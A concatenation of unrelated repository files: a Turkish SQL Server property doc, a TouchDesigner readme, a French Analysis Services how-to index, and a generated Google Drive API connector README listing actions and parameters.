ms.sourcegitcommit: ddf7edb67715a5b9a45e3dd44536dabc153c1de0
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 02/06/2021
ms.locfileid: "99767992"
---
# <a name="smiorderpropertyitem-property"></a>Smorderproperty. Item özelliği
Varlığın sütun sırasını alır. Bu özelliği içeren derlemenin SQLAccess.dll bir arkadaş ilişkisi vardır. SQL Server tarafından kullanılmak üzere tasarlanmıştır. Diğer veritabanları için, bu veritabanı tarafından sunulan barındırma mekanizmasını kullanın.
## <a name="syntax"></a>Syntax
```csharp
internal SmiColumnOrder Item { get; }
```
## <a name="property-value"></a>Özellik değeri
Sütun sırası.
## <a name="remarks"></a>Açıklamalar
> [!WARNING]
> `SmiOrderProperty.Item`Özelliği Dahili ve doğrudan kodunuzda kullanılmamalıdır.
>
> Microsoft, bu özelliğin herhangi bir koşulda bir üretim uygulamasında kullanımını desteklemez.
## <a name="requirements"></a>Gereksinimler
**Ad alanı:**<xref:Microsoft.SqlServer.Server>
**Bütünleştirilmiş kod:** System. Data (System.Data.dll)
**.NET Framework sürümleri:** 2,0 sürümünden itibaren kullanılabilir.
| 30.326923 | 252 | 0.792644 | tur_Latn | 0.978599 |
97a802943f0a644b44693a283d1e55ebbcc12766 | 491 | md | Markdown | forum_ref_networks/readme.md | raganmd/touchdesigner-deferred-lighting | 93e35f228c8fc7a175f62479768ad7801bc9112c | [
"MIT"
] | 22 | 2018-03-22T19:30:55.000Z | 2022-03-01T08:17:44.000Z | forum_ref_networks/readme.md | raganmd/touchdesigner-deferred-lighting | 93e35f228c8fc7a175f62479768ad7801bc9112c | [
"MIT"
] | null | null | null | forum_ref_networks/readme.md | raganmd/touchdesigner-deferred-lighting | 93e35f228c8fc7a175f62479768ad7801bc9112c | [
"MIT"
] | 1 | 2019-02-02T22:11:10.000Z | 2019-02-02T22:11:10.000Z | This work is not my own, and is here only to provide access to shared tehcniques posted on the TouchDesigner forum.
DeferredShading.toe - posted by malcolm http://www.derivative.ca/Forum/viewtopic.php?f=20&t=658&hilit=deferred+render#p1870
deferredTests.2.toe - poseted by archo-p http://www.derivative.ca/Forum/viewtopic.php?f=20&t=658&hilit=deferred+render#p30163
ref networks from TouchDerigner forum thread:
http://www.derivative.ca/Forum/viewtopic.php?f=20&t=658&hilit=deferred+render | 70.142857 | 125 | 0.802444 | eng_Latn | 0.830982 |
97a87cd0428c80a3249ee5c070a92d5e9542c76b | 2,125 | md | Markdown | docs-archive-a/2014/analysis-services/data-mining/mining-structure-tasks-and-how-tos.md | MicrosoftDocs/sql-docs-archive-pr.fr-fr | 5dfe5b24c1f29428c7820df08084c925def269c3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs-archive-a/2014/analysis-services/data-mining/mining-structure-tasks-and-how-tos.md | MicrosoftDocs/sql-docs-archive-pr.fr-fr | 5dfe5b24c1f29428c7820df08084c925def269c3 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-10-11T06:39:57.000Z | 2021-11-25T02:25:30.000Z | docs-archive-a/2014/analysis-services/data-mining/mining-structure-tasks-and-how-tos.md | MicrosoftDocs/sql-docs-archive-pr.fr-fr | 5dfe5b24c1f29428c7820df08084c925def269c3 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-09-29T08:51:33.000Z | 2021-10-13T09:18:07.000Z | ---
title: Tâches de la structure d’exploration de données et procédures | Microsoft Docs
ms.custom: ''
ms.date: 06/13/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology: analysis-services
ms.topic: conceptual
helpviewer_keywords:
- mining structures [Analysis Services], how-to topics
ms.assetid: 085962c2-b50b-4a3b-8176-a0b920e2593a
author: minewiskan
ms.author: owend
ms.openlocfilehash: 2441723198d6fee9c9108e4547d7bc338184bb03
ms.sourcegitcommit: ad4d92dce894592a259721a1571b1d8736abacdb
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 08/04/2020
ms.locfileid: "87612596"
---
# <a name="mining-structure-tasks-and-how-tos"></a>Tâches de la structure d'exploration de données et procédures
L'onglet **Structure d'exploration de données** du Concepteur d'exploration de données de [!INCLUDE[ssBIDevStudioFull](../../includes/ssbidevstudiofull-md.md)] contient des outils qui permettent de créer, de modifier et de traiter une structure d'exploration de données.
## <a name="in-this-section"></a>Dans cette section
- [créer une structure d'exploration de données relationnelle](create-a-new-relational-mining-structure.md)
- [Créer une structure d’exploration de données OLAP](create-a-new-olap-mining-structure.md)
- [ajouter des colonnes à une structure d'exploration de données](add-columns-to-a-mining-structure.md)
- [Supprimer des colonnes d'une structure d'exploration de données](remove-columns-from-a-mining-structure.md)
- [ajouter une table imbriquée à une structure d'exploration de données](add-a-nested-table-to-a-mining-structure.md)
- [Modifier les propriétés d'une structure d'exploration de données](change-the-properties-of-a-mining-structure.md)
- [Modifier la vue de source de données utilisée pour une structure d'exploration de données](edit-the-data-source-view-used-for-a-mining-structure.md)
- [traiter une structure d'exploration de données](process-a-mining-structure.md)
- [Filtrer le cube source d'une structure d'exploration de données](../filter-the-source-cube-for-a-mining-structure.md)
| 47.222222 | 274 | 0.765176 | fra_Latn | 0.736985 |
97a89004940cd11273a96873b47dab107723fd85 | 34,956 | md | Markdown | README.md | flowground/googleapis-com-drive-connector | e75483d4177c075397a436100159e6c50db8d1d1 | [
"Apache-2.0"
] | null | null | null | README.md | flowground/googleapis-com-drive-connector | e75483d4177c075397a436100159e6c50db8d1d1 | [
"Apache-2.0"
] | null | null | null | README.md | flowground/googleapis-com-drive-connector | e75483d4177c075397a436100159e6c50db8d1d1 | [
"Apache-2.0"
] | null | null | null | #  Drive **flow**ground Connector
## Description
A generated **flow**ground connector for the Drive API (version v3).
Generated from: https://api.apis.guru/v2/specs/googleapis.com/drive/v3/swagger.json<br/>
Generated at: 2019-05-23T12:13:21+03:00
## API Description
Manages files in Drive including uploading, downloading, searching, detecting changes, and updating sharing permissions.
## Authorization
Supported authorization schemes:
- OAuth2
For OAuth 2.0 you need to specify OAuth Client credentials as environment variables in the connector repository:
* `OAUTH_CLIENT_ID` - your OAuth client id
* `OAUTH_CLIENT_SECRET` - your OAuth client secret
## Actions
### Gets information about the user, the user's Drive, and system capabilities.
*Tags:* `about`
#### Input Parameters
* `alt` - _optional_ - Data format for the response.
Possible values: json.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists the changes for a user or Team Drive.
*Tags:* `changes`
#### Input Parameters
* `includeCorpusRemovals` - _optional_ - Whether changes should include the file resource if the file is still accessible by the user at the time of the request, even when a file was removed from the list of changes and there will be no further change entries for this file.
* `includeRemoved` - _optional_ - Whether to include changes indicating that items have been removed from the list of changes, for example by deletion or loss of access.
* `includeTeamDriveItems` - _optional_ - Whether Team Drive files or changes should be included in results.
* `pageSize` - _optional_ - The maximum number of changes to return per page.
* `pageToken` - _required_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response or to the response from the getStartPageToken method.
* `restrictToMyDrive` - _optional_ - Whether to restrict the results to changes inside the My Drive hierarchy. This omits changes to files such as those in the Application Data folder or shared files which have not been added to My Drive.
* `spaces` - _optional_ - A comma-separated list of spaces to query within the user corpus. Supported values are 'drive', 'appDataFolder' and 'photos'.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - The Team Drive from which changes will be returned. If specified the change IDs will be reflective of the Team Drive; use the combined Team Drive ID and change ID as an identifier.
### Gets the starting pageToken for listing future changes.
*Tags:* `changes`
#### Input Parameters
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - The ID of the Team Drive for which the starting pageToken for listing future changes from that Team Drive will be returned.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Subscribes to changes for a user.
*Tags:* `changes`
#### Input Parameters
* `includeCorpusRemovals` - _optional_ - Whether changes should include the file resource if the file is still accessible by the user at the time of the request, even when a file was removed from the list of changes and there will be no further change entries for this file.
* `includeRemoved` - _optional_ - Whether to include changes indicating that items have been removed from the list of changes, for example by deletion or loss of access.
* `includeTeamDriveItems` - _optional_ - Whether Team Drive files or changes should be included in results.
* `pageSize` - _optional_ - The maximum number of changes to return per page.
* `pageToken` - _required_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response or to the response from the getStartPageToken method.
* `restrictToMyDrive` - _optional_ - Whether to restrict the results to changes inside the My Drive hierarchy. This omits changes to files such as those in the Application Data folder or shared files which have not been added to My Drive.
* `spaces` - _optional_ - A comma-separated list of spaces to query within the user corpus. Supported values are 'drive', 'appDataFolder' and 'photos'.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - The Team Drive from which changes will be returned. If specified the change IDs will be reflective of the Team Drive; use the combined Team Drive ID and change ID as an identifier.
### Stop watching resources through this channel
*Tags:* `channels`
#### Input Parameters
* `alt` - _optional_ - Data format for the response.
Possible values: json.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists or searches files.
*Tags:* `files`
#### Input Parameters
* `corpora` - _optional_ - Comma-separated list of bodies of items (files/documents) to which the query applies. Supported bodies are 'user', 'domain', 'teamDrive' and 'allTeamDrives'. 'allTeamDrives' must be combined with 'user'; all other values must be used in isolation. Prefer 'user' or 'teamDrive' to 'allTeamDrives' for efficiency.
* `corpus` - _optional_ - The source of files to list. Deprecated: use 'corpora' instead.
Possible values: domain, user.
* `includeTeamDriveItems` - _optional_ - Whether Team Drive items should be included in results.
* `orderBy` - _optional_ - A comma-separated list of sort keys. Valid keys are 'createdTime', 'folder', 'modifiedByMeTime', 'modifiedTime', 'name', 'name_natural', 'quotaBytesUsed', 'recency', 'sharedWithMeTime', 'starred', and 'viewedByMeTime'. Each key sorts ascending by default, but may be reversed with the 'desc' modifier. Example usage: ?orderBy=folder,modifiedTime desc,name. Please note that there is a current limitation for users with approximately one million files in which the requested sort order is ignored.
* `pageSize` - _optional_ - The maximum number of files to return per page. Partial or empty result pages are possible even before the end of the files list has been reached.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `q` - _optional_ - A query for filtering the file results. See the "Search for Files" guide for supported syntax.
* `spaces` - _optional_ - A comma-separated list of spaces to query within the corpus. Supported values are 'drive', 'appDataFolder' and 'photos'.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - ID of Team Drive to search.
### Creates a new file.
*Tags:* `files`
#### Input Parameters
* `ignoreDefaultVisibility` - _optional_ - Whether to ignore the domain's default visibility settings for the created file. Domain administrators can choose to make all uploaded files visible to the domain by default; this parameter bypasses that behavior for the request. Permissions are still inherited from parent folders.
* `keepRevisionForever` - _optional_ - Whether to set the 'keepForever' field in the new head revision. This is only applicable to files with binary content in Drive.
* `ocrLanguage` - _optional_ - A language hint for OCR processing during image import (ISO 639-1 code).
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useContentAsIndexableText` - _optional_ - Whether to use the uploaded content as indexable text.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Generates a set of file IDs which can be provided in create requests.
*Tags:* `files`
#### Input Parameters
* `count` - _optional_ - The number of IDs to return.
* `space` - _optional_ - The space in which the IDs can be used to create new files. Supported values are 'drive' and 'appDataFolder'.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes all of the user's trashed files.
*Tags:* `files`
#### Input Parameters
* `alt` - _optional_ - Data format for the response.
Possible values: json.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes a file owned by the user without moving it to the trash. If the file belongs to a Team Drive the user must be an organizer on the parent. If the target is a folder, all descendants owned by the user are also deleted.
*Tags:* `files`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a file's metadata or content by ID.
*Tags:* `files`
#### Input Parameters
* `acknowledgeAbuse` - _optional_ - Whether the user is acknowledging the risk of downloading known malware or other abusive files. This is only applicable when alt=media.
* `fileId` - _required_ - The ID of the file.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a file's metadata and/or content with patch semantics.
*Tags:* `files`
#### Input Parameters
* `addParents` - _optional_ - A comma-separated list of parent IDs to add.
* `fileId` - _required_ - The ID of the file.
* `keepRevisionForever` - _optional_ - Whether to set the 'keepForever' field in the new head revision. This is only applicable to files with binary content in Drive.
* `ocrLanguage` - _optional_ - A language hint for OCR processing during image import (ISO 639-1 code).
* `removeParents` - _optional_ - A comma-separated list of parent IDs to remove.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useContentAsIndexableText` - _optional_ - Whether to use the uploaded content as indexable text.
### Lists a file's comments.
*Tags:* `comments`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to include deleted comments. Deleted comments will not include their original content.
* `pageSize` - _optional_ - The maximum number of comments to return per page.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `startModifiedTime` - _optional_ - The minimum value of 'modifiedTime' for the result comments (RFC 3339 date-time).
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a new comment on a file.
*Tags:* `comments`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Deletes a comment.
*Tags:* `comments`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a comment by ID.
*Tags:* `comments`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to return deleted comments. Deleted comments will not include their original content.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a comment with patch semantics.
*Tags:* `comments`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists a comment's replies.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to include deleted replies. Deleted replies will not include their original content.
* `pageSize` - _optional_ - The maximum number of replies to return per page.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a new reply to a comment.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Deletes a reply.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `replyId` - _required_ - The ID of the reply.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a reply by ID.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to return deleted replies. Deleted replies will not include their original content.
* `replyId` - _required_ - The ID of the reply.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a reply with patch semantics.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `replyId` - _required_ - The ID of the reply.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a copy of a file and applies any requested updates with patch semantics.
*Tags:* `files`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `ignoreDefaultVisibility` - _optional_ - Whether to ignore the domain's default visibility settings for the created file. Domain administrators can choose to make all uploaded files visible to the domain by default; this parameter bypasses that behavior for the request. Permissions are still inherited from parent folders.
* `keepRevisionForever` - _optional_ - Whether to set the 'keepForever' field in the new head revision. This is only applicable to files with binary content in Drive.
* `ocrLanguage` - _optional_ - A language hint for OCR processing during image import (ISO 639-1 code).
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Exports a Google Doc to the requested MIME type and returns the exported content. Please note that the exported content is limited to 10MB.
*Tags:* `files`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `mimeType` - _required_ - The MIME type of the format requested for this export.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists a file's or Team Drive's permissions.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file or Team Drive.
* `pageSize` - _optional_ - The maximum number of permissions to return per page. When not set for files in a Team Drive, at most 100 results will be returned. When not set for files that are not in a Team Drive, the entire list will be returned.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a permission for a file or Team Drive.
*Tags:* `permissions`
#### Input Parameters
* `emailMessage` - _optional_ - A plain text custom message to include in the notification email.
* `fileId` - _required_ - The ID of the file or Team Drive.
* `sendNotificationEmail` - _optional_ - Whether to send a notification email when sharing to users or groups. This defaults to true for users and groups, and is not allowed for other requests. It must not be disabled for ownership transfers.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `transferOwnership` - _optional_ - Whether to transfer ownership to the specified user and downgrade the current owner to a writer. This parameter is required as an acknowledgement of the side effect.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Deletes a permission.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file or Team Drive.
* `permissionId` - _required_ - The ID of the permission.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a permission by ID.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `permissionId` - _required_ - The ID of the permission.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a permission with patch semantics.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file or Team Drive.
* `permissionId` - _required_ - The ID of the permission.
* `removeExpiration` - _optional_ - Whether to remove the expiration date.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `transferOwnership` - _optional_ - Whether to transfer ownership to the specified user and downgrade the current owner to a writer. This parameter is required as an acknowledgement of the side effect.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists a file's revisions.
*Tags:* `revisions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `pageSize` - _optional_ - The maximum number of revisions to return per page.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes a file version. You can only delete revisions for files with binary content, like images or videos. Revisions for other files, like Google Docs or Sheets, and the last remaining file version can't be deleted.
*Tags:* `revisions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `revisionId` - _required_ - The ID of the revision.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a revision's metadata or content by ID.
*Tags:* `revisions`
#### Input Parameters
* `acknowledgeAbuse` - _optional_ - Whether the user is acknowledging the risk of downloading known malware or other abusive files. This is only applicable when alt=media.
* `fileId` - _required_ - The ID of the file.
* `revisionId` - _required_ - The ID of the revision.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a revision with patch semantics.
*Tags:* `revisions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `revisionId` - _required_ - The ID of the revision.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Subscribes to changes to a file
*Tags:* `files`
#### Input Parameters
* `acknowledgeAbuse` - _optional_ - Whether the user is acknowledging the risk of downloading known malware or other abusive files. This is only applicable when alt=media.
* `fileId` - _required_ - The ID of the file.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists the user's Team Drives.
*Tags:* `teamdrives`
#### Input Parameters
* `pageSize` - _optional_ - Maximum number of Team Drives to return.
* `pageToken` - _optional_ - Page token for Team Drives.
* `q` - _optional_ - Query string for searching Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then all Team Drives of the domain in which the requester is an administrator are returned.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a new Team Drive.
*Tags:* `teamdrives`
#### Input Parameters
* `requestId` - _required_ - An ID, such as a random UUID, which uniquely identifies this user's request for idempotent creation of a Team Drive. A repeated request by the same user and with the same request ID will avoid creating duplicates by attempting to create the same Team Drive. If the Team Drive already exists a 409 error will be returned.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes a Team Drive for which the user is an organizer. The Team Drive cannot contain any untrashed items.
*Tags:* `teamdrives`
#### Input Parameters
* `teamDriveId` - _required_ - The ID of the Team Drive
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
